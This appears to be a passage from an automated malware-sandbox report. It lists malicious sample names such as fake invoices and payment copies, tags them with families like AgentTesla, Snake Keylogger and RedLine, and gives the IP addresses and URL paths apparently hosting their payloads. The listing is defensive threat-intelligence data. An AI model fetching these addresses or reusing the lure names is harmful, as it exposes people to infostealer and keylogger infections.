                                    • 45.137.22.163/fresh_Djctepjr.png
                                    factura proforma PI- PI04522 7486.exeGet hashmaliciousUnknownBrowse
                                    • 45.137.22.163/trans_Yygygcyg.jpg
                                    PI- PI04522 74868.exeGet hashmaliciousAgentTeslaBrowse
                                    • 45.137.22.163/proforma_invoice_Crnbdlom.png
                                    paymentcopy-pdf__________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                    • 45.137.22.163/Wmdmjhtr_Pendcahw.bmp
                                    Paymentcopy-pdf___________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                    • 45.137.22.163/Dhjuzchby_Xwgoflwi.bmp
                                    AIR CARGO BOARDING shipment MAWB 40608657504.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 45.137.22.163/Ejghs_Imuzrnrb.png
                                    PI- PI04522748-pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 45.137.22.163/Cpogmqp_Qhkfesil.jpg
                                    Ordine di acquisto PO-JTT-00001018.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 45.137.22.163/Htrcekszm_Kcdcxrzw.jpg
                                    5.252.165.214rMSC-AQP-Newquotationrequest-ES0083ESP23.batGet hashmaliciousUnknownBrowse
                                      SecuriteInfo.com.Win64.TrojanX-gen.32623.1958.exeGet hashmaliciousPureLog StealerBrowse
                                        tDEOY2VfAj.exeGet hashmaliciouszgRATBrowse
                                          Qtagiietkyb.png.batGet hashmaliciousStrela StealerBrowse

                                            Domains

                                            No context

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            ROOTLAYERNETNLSysiq.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 45.137.22.163
                                            NEW_ORDER_12-18-23.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 45.137.22.163
                                            PAYMENT_TT_COPY.pdf.exeGet hashmaliciousRedLineBrowse
                                            • 185.222.58.239
                                            SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 45.137.22.163
                                            cVw2fI6l0l.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                            • 45.137.21.8
                                            D4CJJrRyRV.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoader, XmrigBrowse
                                            • 45.137.21.8
                                            C2qEwpO6ff.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, PureLog Stealer, RedLine, SmokeLoader, XmrigBrowse
                                            • 45.137.21.8
                                            rQ7KS66xHz.exeGet hashmaliciousGlupteba, PureLog Stealer, RedLine, SmokeLoader, XmrigBrowse
                                            • 45.137.21.8
                                            cgROS79PO8.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoader, XmrigBrowse
                                            • 45.137.21.8
                                            GQmlDdfIus.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoader, XmrigBrowse
                                            • 45.137.21.8
                                            tFXV5OO73i.exeGet hashmaliciousGlupteba, PureLog Stealer, RedLine, SmokeLoader, XmrigBrowse
                                            • 45.137.21.8
                                            xR0Sb2wGy9.exeGet hashmaliciousRedLineBrowse
                                            • 185.222.58.99
                                            rdU3cg9xmI.exeGet hashmaliciousGlupteba, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader, XmrigBrowse
                                            • 45.137.21.8
                                            Dzc2otu6qd.exeGet hashmaliciousGlupteba, LummaC Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, XmrigBrowse
                                            • 45.137.21.8
                                            YRdCIU1WYM.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                            • 45.137.21.8
                                            ae6r1Pwu4b.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoader, XmrigBrowse
                                            • 45.137.21.8
                                            8d6f8324030f8c1566ab38f8ade3c386b7b7740ccaf28.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                            • 45.137.21.8